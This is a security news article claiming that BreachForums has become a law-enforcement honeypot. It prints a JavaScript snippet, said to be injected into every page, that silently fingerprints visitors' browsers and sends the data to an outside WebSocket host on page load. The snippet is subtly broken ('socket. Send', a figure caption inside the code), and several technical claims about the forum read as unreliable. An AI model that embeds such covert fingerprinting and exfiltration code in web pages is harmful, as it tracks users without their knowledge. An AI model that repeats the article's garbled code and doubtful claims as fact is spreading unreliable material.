The threat actor collective ShinyHunters has recently announced that BreachForums—one of the most prolific breeding grounds for stolen credentials and leak data—has been commandeered by international law enforcement agencies.
According to Shiny from ShinyHunters, the site’s administrative controls, including the accounts “Hollow,” “ShinyHunters,” and the original “Founder,” now operate under the oversight of French authorities in coordination with the FBI.
Initial reports suggest that users attempting to log in to the forum are unknowingly submitting their credentials and device fingerprints into a sophisticated honeypot designed to trace and identify criminal actors.
BreachForums first emerged as a successor to several defunct leak-sharing platforms, quickly attracting cybercriminals by offering an encrypted messaging system and built-in scraping tools to harvest breached databases automatically.
Its primary attack vectors included SQL injection exploits against poorly secured partner sites and a proprietary botnet that distributed phishing kits.
Hackmanac analysts identified anomalous traffic patterns and injection payloads embedded in login redirects as early as July 2025, suggesting that site modifications were underway to convert the forum into a trap for its own user base.
The impact on the underground economy is profound: data sellers and leakers are now reluctant to share or purchase sensitive information, fearing exposure.
Victims of credential stuffing campaigns may see an uptick in targeted enforcement operations, as honeypot captures provide actionable intelligence on device fingerprints, IP geolocation, and intrusion tools.
The initiative reflects a broader trend of law enforcement leveraging deception operations to disrupt cybercrime ecosystems.
Delving deeper into BreachForums’ transformation, the honeypot injects a stealth JavaScript snippet into every served page.
This script silently fingerprints browsers and exfiltrates session information via an encrypted WebSocket channel:-
// Figure 1: honeypot_architecture.png
(function() {
const socket = new WebSocket("wss://leaktrack.law/honeypot");
socket.onopen = () => {
const fingerprint = {
ua: navigator.userAgent,
plugins: navigator.plugins.length,
time: Date.now()
};
socket. Send(btoa(JSON.stringify(fingerprint)));
};
socket.onmessage = (evt) => {
console.log("Honeypot response:", atob(evt.data));
};
})(); This payload executes immediately upon page load, collecting user-agent strings, installed plugin counts, and precise timestamps before transmitting them to law enforcement servers.
Additional persistence tactics include dynamically generated iframe embeds that reconnect every five minutes, ensuring that even passive visitors are continuously monitored.
Through this design, the authorities can correlate login attempts with real-world identities, effectively turning BreachForums into a digital dragnet.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Microsoft has pushed out an emergency, out-of-band Windows 11 update after its September Patch Tuesday…
CDR is the runtime, real-time half of cloud security: while CSPM tells you what’s misconfigured,…
Your SaaS estate M365, Salesforce, Workday, Slack, hundreds of others is a sprawl of misconfigurations,…
DSPM finds sensitive data you didn’t know you had, classifies it, maps who can reach…
Open-source packages are meant to save developers time. In the GemStuffer campaign, that trust became…
Google has released an important Chrome 153 security update that fixes 42 vulnerabilities across the…